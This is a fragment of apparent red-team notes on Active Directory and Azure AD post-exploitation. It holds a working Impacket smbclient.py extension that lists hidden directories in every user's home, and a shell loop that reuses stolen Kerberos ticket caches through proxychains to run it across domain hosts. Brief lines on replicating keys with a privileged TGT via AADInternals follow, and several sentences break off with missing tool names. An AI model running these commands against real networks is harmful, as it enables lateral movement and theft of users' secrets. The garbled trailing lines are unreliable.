Impacket's smbclient.py extension (searches for hidden directories in every user's home):
def do_hidden(self, args=None):
hidden = []
for item1 in self.smb.listPath(self.share, '\\Users\\*'):
longname1 = item1.get_longname()
if item1.is_directory() and longname1 not in ('.', '..'):
dir0 = ntpath.join('\\Users', longname1)
try:
ls = self.smb.listPath(self.share, ntpath.join(dir0, '*'))
except:
continue
else:
for item2 in ls:
longname2 = item2.get_longname()
if item2.is_directory() and longname2 not in ('.', '..') and longname2.startswith('.'):
hidden.append((item2, ntpath.join(dir0, longname2)))
result = ''
for item, name in hidden:
result += 'drw-rw-rw- '
result += f'{datetime.fromtimestamp(item.get_mtime_epoch()).strftime("%Y/%m/%d %H:%M:%S"):>21} '
result += ' '
result += name
result += '\n'
print(result.strip())
Collect hidden directories:
$ ls tickets/
SRV01.ccache SRV02.ccache PC01.ccache
$ echo 'use c$\ninfo\nhidden' > cmd
$ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done
Search for hidden directories that start with .az:
We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so $Credentials (, C:\Program Files\WindowsPowerShell\Modules\AADInternals\0.9.3\DRS_Utils.ps1) can be omitted.
Automated with :
Collect with and decrypt with a backup key (similar to ):
